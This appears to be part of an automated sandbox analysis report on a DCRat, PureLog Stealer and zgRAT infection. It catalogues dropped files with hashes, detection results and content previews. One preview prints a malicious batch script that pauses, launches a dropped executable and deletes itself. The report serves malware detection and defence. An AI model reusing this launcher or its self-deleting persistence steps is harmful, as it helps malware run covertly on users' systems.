	HMhdtzxEHf.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	Gg6wivFINd.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	onlysteal.exe	Get hash	malicious	DCRat	Browse
	t8F7Ic986c.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse

Created / dropped Files

C:\Recovery\24dbde2999530e

Download File

Process:	C:\winRefruntime\MsAgentDriverruntime.exe
File Type:	ASCII text, with very long lines (903), with no line terminators
Category:	dropped
Size (bytes):	903
Entropy (8bit):	5.911081011708073
Encrypted:	false
SSDEEP:	24:ZlhxPcX55nqxLmSQWd177fMO8iQPYoNILFap1U:ThJcXfnq917aihlFE6
MD5:	5A2395D1A4EB85AEA1690A1A62161A87
SHA1:	4EE0C638E01A0CEAC14D509419F88F92837BC3D7
SHA-256:	1E31E8E65F408CB4F6F4B9CF9332957DE59EB9C0C7ADD586C3215EE0E60E79C9
SHA-512:	CA825E7AC73D66241B13556FAA08BD38EA2240B6D2EEB8A8D54063A23985F2A1FC192BF8D484502715D2C0B03A48878AC8A7C5F2DF2D06AF9ACC59D47BC0610F
Malicious:	false
Reputation:	low
Preview:	eI8XfNSBNWyWmXuGzoVPo7D0bXd4VoPOB05tU5jUSXdXqoa2MKNwPRPgFH5ItXpiGjUwcBv3EB7QdpKx6krLbd9ukYoN9bk4r5QGToaLYTrNU8DZ7HLIpeGnjkLEWi4maCjiYDeSKgwHvwamUOQ1QcOMynhtdWyzZFwRZeB3n37Jr92xJjtISCW8xWtvgvzyr6rq9IMzNWOXeFezvtj3mqhXsyeCvQX2DJcvRLxAW346x9es149wL5LAZU7LoKE68WTUmthj6ihtwlktTvK0QlqI8cW6OlWMy87apJFIWazmYcOxuN129OpXqLWKXlUVMV4xnJDKqCe0vDufOiMAtdNkSkuew5uvFeZCiaKkKrM6tzlmb06zYUltHTfDZjXvSsuQnr7xYm0CQQ0c8ID585Xv2q4O4GLkTboBEV8u3Ibwdjc1cDFRgbwWV9X7wt3RaPszmzXnJSC0elRTNDv1B4E1oRqF7A7JPJVO1nOnpcHNY62urEus7BQgK0KVJSqJV3lUQDbjzIMjx1csZ6X2QPMN3yDAd3dXv82fUheonK3yzrtTYb6N4y2GqXbb9bG6pyxz96X1ctPFWYYMFumB7Qc7Fvz7GCoLD6JA34UbDEvLixuS9PWPzF9YWztNHauZEDBZOXSKaK72fQYRBg81qYW87uoEKGTnUVHfvUDl7LzoHH2FacLlc3tpqDcdsN9T1UiKJ3grcW3eir102jos5sLambys2k3tLgxwis5h5eIF9OG8LllJjRYIJHhsEyy2dKSC4ERJnGwakFaYUzgQ8tK4IonbLMcHpPmz5EEHUcgce7iDqJYORh4t9Y4Pa08aopuUdlcPvZ6gNsZKGkuByOzIV2zgJyqeeFyyMOkFqIc2lYgR8uJ0F6lZzm9kv5G7scBH3k7

C:\Recovery\2f08a7aa5b4dd8

Download File

Process:	C:\winRefruntime\MsAgentDriverruntime.exe
File Type:	ASCII text, with very long lines (664), with no line terminators
Category:	dropped
Size (bytes):	664
Entropy (8bit):	5.888238148898995
Encrypted:	false
SSDEEP:	12:mjYM2YKQt8VJjurWAqe8Lw1MB0ctZaul6ya67xIXJArX5uiERqzjx:m0M2YKQtKjuCw8LHjZc69AqVuiERy
MD5:	B6D84C1D50065BCB1D2D0A380BCEC327
SHA1:	BEF4273C285A0EFAC7EDF418D983EB960E844E91
SHA-256:	B6500AC9DCE0CB225087DD15A365C1866C18F10DEC41FE76489FDCA3E9A387C7
SHA-512:	97D90A2F275F8CA8116A18630F2ED5B7C9D138CC7D6363032EB2CB6CDD3D2BB15F5EC0EEEA72486419BEB3F7704E85864599F16EBAAE429C45087E1F2AF94427
Malicious:	false
Reputation:	low
Preview:	FM6I6eI38RieaB0sFcCQTO0JzntaA5olUccykxUGkljkLZFzKuDAhHV0WxSTvs2Dn6K8iBISH5psoQ7Zi4PQ1nEMHlcweBV2sf6PPGQJmv2lbmMG02u0dmM92717jVxFkxAJTsKboFnFucueZV6lReYFT6WSPTkR8xBomCxHsTMX8GPZMXhNYLyFY4zWV1MUfWH7bG1Wiz38RAGNr7G2vW2x85QsNaw1H12m9S7FfLojS0xXxmpYvTjIdT9g0JJICB0aIeNZ9AWksTfHH24lvXGxStIpTbPVCggQ9XPTYPZu69aKy1Y8PiWo5DHYWiGiuAiLxOHtmkMf8V0TT80bCRGdJ1V6Q07zJ095aOXktpVoV1qjNyFXsofd4EC53LdwnWVIW42ElPsX6cISLvtbujHfUgBWMbrhLjA8fhNS5Bwc6Ihc5tuHcBBEO0xz3g2JiKLWbJxniagtwpiL8jacrjFJi6uouXYZIn3w7KAw6GjBfRRjRl1UFZc8ECyfZJ2KCGlJwwOyiogkADoRoLWJgETsL4r5WeXwNY9YpIxfWDvb318AXh0Owtn7x281ETbEQtXlEPlgY1wdT2zT6rhyoIAevClxJ5aClrKJdX6I6U056Kn4Co5XwnZHt30CoxWcat2mrqziuZ2TSFhkYqufADQ7

C:\Recovery\WBnjVTGHzbhirvM.exe

Download File

Process:	C:\winRefruntime\MsAgentDriverruntime.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1915392
Entropy (8bit):	7.539404623748641
Encrypted:	false
SSDEEP:	24576:zHaYHemPiKIUdWp9NZAXY000Ub/TdvsXhhbtRtAC+IEZ9rSyzPXcWPdzw25/nNy:DJRIfpxAXalU7tPA3IEHHPo25fN
MD5:	C3A0C717ED8A025658E5A4C0F53281D9
SHA1:	1E7EDDFCC83D9B03D69DBAAA64E925792FD6C76D
SHA-256:	E1B05CF5E4C9736A90867217DD7208573BACB4822E4083C999A8212CB59C83DD
SHA-512:	C359A40A89D5CF191DD08D81D6077364B6B974E4E83DDAAB6BA04DF8098AA9742CF73BF5170E5E528CC255C0CEDA39905B7A84FA30DB2118CC62B855F839A501
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\WBnjVTGHzbhirvM.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\WBnjVTGHzbhirvM.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\WBnjVTGHzbhirvM.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\WBnjVTGHzbhirvM.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\WBnjVTGHzbhirvM.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\WBnjVTGHzbhirvM.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\WBnjVTGHzbhirvM.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\WBnjVTGHzbhirvM.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 66%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....cxg.................2...........P... ...`....@.. ....................................@.................................pP..K....`.. ............................................................................ ............... ..H............text....0... ...2.................. ..`.rsrc... ....`.......4..............@....reloc...............8..............@..B.................P......H...........T................u...O.......................................0..........(.... ........8........E........M...N...)...8....(.... ....~....{n...9....& ....8....(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8y......0..Q....... ........8........E........Z...N...............)...8....8O... ....~....{....9....& ....8.......... ....~....{....:....& ....8....r...ps....z~....9.... ....~....{....9g...& ....8\.......~....(Z...~....(^... ....<.... ....80.

C:\Recovery\WmiPrvSE.exe

Download File

Process:	C:\winRefruntime\MsAgentDriverruntime.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1915392
Entropy (8bit):	7.539404623748641
Encrypted:	false
SSDEEP:	24576:zHaYHemPiKIUdWp9NZAXY000Ub/TdvsXhhbtRtAC+IEZ9rSyzPXcWPdzw25/nNy:DJRIfpxAXalU7tPA3IEHHPo25fN
MD5:	C3A0C717ED8A025658E5A4C0F53281D9
SHA1:	1E7EDDFCC83D9B03D69DBAAA64E925792FD6C76D
SHA-256:	E1B05CF5E4C9736A90867217DD7208573BACB4822E4083C999A8212CB59C83DD
SHA-512:	C359A40A89D5CF191DD08D81D6077364B6B974E4E83DDAAB6BA04DF8098AA9742CF73BF5170E5E528CC255C0CEDA39905B7A84FA30DB2118CC62B855F839A501
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\WmiPrvSE.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\WmiPrvSE.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 66%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....cxg.................2...........P... ...`....@.. ....................................@.................................pP..K....`.. ............................................................................ ............... ..H............text....0... ...2.................. ..`.rsrc... ....`.......4..............@....reloc...............8..............@..B.................P......H...........T................u...O.......................................0..........(.... ........8........E........M...N...)...8....(.... ....~....{n...9....& ....8....(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8y......0..Q....... ........8........E........Z...N...............)...8....8O... ....~....{....9....& ....8.......... ....~....{....:....& ....8....r...ps....z~....9.... ....~....{....9g...& ....8\.......~....(Z...~....(^... ....<.... ....80.

C:\Users\Default\Favorites\2f08a7aa5b4dd8

Download File

Process:	C:\winRefruntime\MsAgentDriverruntime.exe
File Type:	ASCII text, with very long lines (880), with no line terminators
Category:	dropped
Size (bytes):	880
Entropy (8bit):	5.902182644804092
Encrypted:	false
SSDEEP:	24:s6EEURuDrKEjuRnSaSDULyeveLLxDYN8Z18dLiJkrN:suyuDOEqSaSGy+eLLpYN81KesN
MD5:	A3B9F834F05CD3D09275BF31D6BC5F2A
SHA1:	9DB7B224F5FD142BFEA9D04177603AB07C001180
SHA-256:	121F720C24098226B21671A0A98D635B4F6376236097C562F8BDD2263599518E
SHA-512:	17BCD1487986DE5901B6A0227A657F8D807DBA31AF9BA9C824A9FC342DBA5D54E71DA26FC1CD2146AF48D2D5807F6027917E4E8FFD4C8E91B48881EAD23D775C
Malicious:	false
Preview:	a1OLuYtaRFlSRtK0mlWD6eumbfOoeXwEKOTnxQ6pY8bZESbeHxHk6955GmuOKE54TgHCagDWprp8DUiIEuhrQLHLTXhKfrfTChGhKYEktv5PU62vEmKZhNnHZ6tD9207MV6fOA7qq67fQ10WevG3hFwy38IOoAl147D8AXhDpetkPI1hFXiNv7aHiHlQ2tBpUGlSy2VHODODVMjvHkIRbYG6h6Z3vQK5cEPJhisNBb9stWvWi0JSktN6Aov1ccW72SkQ6ZOi14QAYXMKKDU4H2Vs0SJ2w1viFB0bveZJmkaqdNimblrZIbz962ZoPVwAIr4WhvYpnLShcoPnugbLJWaoM0e3Fv3RyZhvSLFqMBv6IShSmw3t3k0wRQKqQfk1SBsCHdVjbu9Ikdf3SMQS2KXNiveCAYZqb3nHjeLJaURIlsLxuRXDOR9IofdW9TjDVSrrzYUyBH2i2Om0jqRtAWcJ3fdEAzJHvOxSBe7W7jCGZbPZ2nwSBzC90hxU5PxM7uxoaUyEs5waTVtcPDMWC0G5LybdrnarwzIool9hzskFDlpexVE2DaKHo1cl2UXEeEodMExoDohTQA1jJ6pWiinWpBAwIXoeVfl97LSshayZ200oA3c6oAg6aRyLEAfq9C8uZ2m7o7yIuOdzLWvP4s0U9oipXHog4Ha01FPIReRrMXLMy99rOQvQMovuT6khSRNmyn7FHn8abIHmdW1YH6RoWJnMUezU4uZ4JjXLB4klRVyEgJQ6FMaVAjQo9uvmynfrtNc38qWMWqWAUjqKO2PrTD4kSsLQI7xnzHUTqX7YzN8UMPUaEkY5YyXqT2lQeGDZ2sLNOXd1402GEkXDYuLhi1PBto9yvr3tJjbdEHLrHhBh

C:\Users\Default\Favorites\WBnjVTGHzbhirvM.exe

Download File

Process:	C:\winRefruntime\MsAgentDriverruntime.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1915392
Entropy (8bit):	7.539404623748641
Encrypted:	false
SSDEEP:	24576:zHaYHemPiKIUdWp9NZAXY000Ub/TdvsXhhbtRtAC+IEZ9rSyzPXcWPdzw25/nNy:DJRIfpxAXalU7tPA3IEHHPo25fN
MD5:	C3A0C717ED8A025658E5A4C0F53281D9
SHA1:	1E7EDDFCC83D9B03D69DBAAA64E925792FD6C76D
SHA-256:	E1B05CF5E4C9736A90867217DD7208573BACB4822E4083C999A8212CB59C83DD
SHA-512:	C359A40A89D5CF191DD08D81D6077364B6B974E4E83DDAAB6BA04DF8098AA9742CF73BF5170E5E528CC255C0CEDA39905B7A84FA30DB2118CC62B855F839A501
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 66%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....cxg.................2...........P... ...`....@.. ....................................@.................................pP..K....`.. ............................................................................ ............... ..H............text....0... ...2.................. ..`.rsrc... ....`.......4..............@....reloc...............8..............@..B.................P......H...........T................u...O.......................................0..........(.... ........8........E........M...N...)...8....(.... ....~....{n...9....& ....8....(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8y......0..Q....... ........8........E........Z...N...............)...8....8O... ....~....{....9....& ....8.......... ....~....{....:....& ....8....r...ps....z~....9.... ....~....{....9g...& ....8\.......~....(Z...~....(^... ....<.... ....80.

C:\Users\Public\Desktop\2f08a7aa5b4dd8

Download File

Process:	C:\winRefruntime\MsAgentDriverruntime.exe
File Type:	ASCII text, with very long lines (946), with no line terminators
Category:	dropped
Size (bytes):	946
Entropy (8bit):	5.894606060013795
Encrypted:	false
SSDEEP:	12:jqk9k0HiqA07bmVOjrJTLKyLZ+UaBRadMfnfZW9FbSdK1yfYX6Fg1NTmxSfvZ:mEjTmcLKyN+UIadinfZW9FbmfY+LxKZ
MD5:	F736FB922BD5A42A7FE08E8AE6B74778
SHA1:	EAE21B4536FF18E368BD0C7F128EFC150536ABF1
SHA-256:	251B37108F2F214DF88A38B724A9E9A8184D39F499E4092F8AEC3E730031B2BF
SHA-512:	74062B7E7563857045BA425263B4E0D62D8D769773641D9728245625C019486B8B173C8772B970883500A9FB9E2072D78924F530B94E5B3D0FC9D430B94B890A
Malicious:	false
Preview:	9zfKlHSyZjushhPcBKnYhkUg0cnrKuZwDRSxHDD8j2NlzZudXLpojbZYe8TJeknpK8oQOcU7HoyoXtqbsKU9EuNm13SJt4e8Pia1ueO50sh4mvBvR2aUQokZuCYUJLNMK0ZzSzqO5ZJWMT9G2g11eJsk7AHrF3voeVuwVLdcMMY1eOMbCRcnUWsAHy2Rs8ICne11iNuqDYoRv1GtxqpybIUInuohTLuNEWNAWV2zgvj5raOQrIdBTUkeKsOyjNX1oaNZnGWcxzRpjYaNfXzKss4tvtznHDQTYsQRMznlwBNdC55vSASLXMJ5gdn4QsUuj7R0IJApuOYrebr0xEVGvE6MjUusMtVDqd3EnEnIAnaJxbbEwxGLWO9eBFRxYSdB2UABhmMsbNGHnxYH3q6ZmJrbeYDixztrKZQcaZhJkXtJH11OqK3sWEYtnjgIjo5ldY7Og5qdIwyOZhTnhz1n6BVFAhz13Yk5cIqt3mrudZkjPKTGP3ktwRpcD1N9GyktL2vR1kt4HGJgav00NtmAy0IKcOqBZrooz0YXYCPoJqlpIIBRBWwXMk5Utlym4rfacerkXdcLe70HOcCUMYAC5RcO5EnxNmucLLNnaa4i4k2PtxFQieafrceLCdpTzo72NY6DPY3vebHUYNfH8WOtLPusrBl7vlsQmABV1CBKkoAPUJxy7iUdaOq8nNVOw6A3s1sXLJP6VDIhOeYhOx9NQPzXUDrnqwYonGhdbZmySXHWGItIzx996xncBUDHcmPipe4H74GyKL42HcRLUix2xZr0dEbHWfVqIjrmOlL4rLyv2uUjC1x3yXvQwDo2d8cpzOuivp7sX2Lmk68tt2Efrc1vyazK7TbtsJ5n9wxX3Eg5LIp0F4Il377XW9tVzwuEbc3bAUt7Erln56jpu8FDKzzvMiQACchHUcdtPO0uKLgLVUbaaE

C:\Users\Public\Desktop\WBnjVTGHzbhirvM.exe

Download File

Process:	C:\winRefruntime\MsAgentDriverruntime.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1915392
Entropy (8bit):	7.539404623748641
Encrypted:	false
SSDEEP:	24576:zHaYHemPiKIUdWp9NZAXY000Ub/TdvsXhhbtRtAC+IEZ9rSyzPXcWPdzw25/nNy:DJRIfpxAXalU7tPA3IEHHPo25fN
MD5:	C3A0C717ED8A025658E5A4C0F53281D9
SHA1:	1E7EDDFCC83D9B03D69DBAAA64E925792FD6C76D
SHA-256:	E1B05CF5E4C9736A90867217DD7208573BACB4822E4083C999A8212CB59C83DD
SHA-512:	C359A40A89D5CF191DD08D81D6077364B6B974E4E83DDAAB6BA04DF8098AA9742CF73BF5170E5E528CC255C0CEDA39905B7A84FA30DB2118CC62B855F839A501
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 66%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....cxg.................2...........P... ...`....@.. ....................................@.................................pP..K....`.. ............................................................................ ............... ..H............text....0... ...2.................. ..`.rsrc... ....`.......4..............@....reloc...............8..............@..B.................P......H...........T................u...O.......................................0..........(.... ........8........E........M...N...)...8....(.... ....~....{n...9....& ....8....(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8y......0..Q....... ........8........E........Z...N...............)...8....8O... ....~....{....9....& ....8.......... ....~....{....:....& ....8....r...ps....z~....9.... ....~....{....9g...& ....8\.......~....(Z...~....(^... ....<.... ....80.

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MsAgentDriverruntime.exe.log

Download File

Process:	C:\winRefruntime\MsAgentDriverruntime.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1179
Entropy (8bit):	5.354252320228764
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mM:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHK2
MD5:	074445AD437DEED8A22F11A846280CE2
SHA1:	23025D83D7C33396A5F736FC6F9945976CFCD5D1
SHA-256:	B7FD27029E12BE3B5C2C4010CC9C9BCB77CFE44852CC6EF4C3CED70740BB1CFD
SHA-512:	440F8E77340A5C2F64BF97BC712193145F03AEDB86C0F5C849CA1AD0190E5621DDD7AE8104862383E31FFEC49CCF483CF2E4533C501B2606EE1D0FE66E865B6D
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

C:\Users\user\AppData\Local\Temp\1rr3mmHPcD

Download File

Process:	C:\winRefruntime\MsAgentDriverruntime.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.323856189774723
Encrypted:	false
SSDEEP:	3:4JjRkh2G:4JOh2G
MD5:	6F7BA8F5D3B6DF072118C562F2993A49
SHA1:	1F19EDFD5D808E43A7A17A2617B13ED594EBC300
SHA-256:	D83C26C7FA3C2BA437656B753420803CE8D582214ED3FEE43660C5DC4AB8F7CA
SHA-512:	0B71B794D2912C9C18AE1CCA61098E92A20778177854B43332190683D64A4E036A017DB73D8E922F01D96C0CAB732422EF88F2F63AE92E22DA510C3EC02EBF01
Malicious:	false
Preview:	t4mKeSdczagIU28Sna1G0j82q

C:\Users\user\AppData\Local\Temp\ani1HH9Yqa.bat

Download File

Process:	C:\winRefruntime\MsAgentDriverruntime.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	207
Entropy (8bit):	5.244446592388816
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE7ZOxIvKOZG1wkn23fyG:HTg9uYDE7QIfR
MD5:	19D5EF18FE41C4AB0827A646DD40BFCD
SHA1:	E5350235FF09C0570F325824D6F7C44872B13B2E
SHA-256:	2AD107F79C54925D0465041768DF23FAE3EA5B7A010ED6CF238C5134A27C9B6D
SHA-512:	6564F49391FE9A6A2C56E37CC0A93C9929E5C9C4AD904D22AD5EA3F4E1584ED597601F5FDF1BD5E127A5906077C6621BF511E757A34682E3F18062D40F9B96C0
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Recovery\WBnjVTGHzbhirvM.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\ani1HH9Yqa.bat"

C:\Users\user\Desktop\GWwNmKBL.log

Download File

Process:	C:\Recovery\WBnjVTGHzbhirvM.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Joe Sandbox View:	Filename: PlZA6b48MW.exe, Detection: malicious, Browse Filename: wxl1r0lntg.exe, Detection: malicious, Browse Filename: HaLCYOFjMN.exe, Detection: malicious, Browse Filename: Z90Z9bYzPa.exe, Detection: malicious, Browse Filename: 0J5DzstGPi.exe, Detection: malicious, Browse Filename: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, Detection: malicious, Browse Filename: HMhdtzxEHf.exe, Detection: malicious, Browse Filename: Gg6wivFINd.exe, Detection: malicious, Browse Filename: onlysteal.exe, Detection: malicious, Browse Filename: t8F7Ic986c.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\PinddLxP.log

Download File

Process:	C:\winRefruntime\MsAgentDriverruntime.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\cZPJNcWU.log

Download File

Process:	C:\Recovery\WBnjVTGHzbhirvM.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\hnfQTxsY.log

Download File

Process:	C:\winRefruntime\MsAgentDriverruntime.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\nFKhSFqw.log

Download File

Process:	C:\Recovery\WBnjVTGHzbhirvM.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
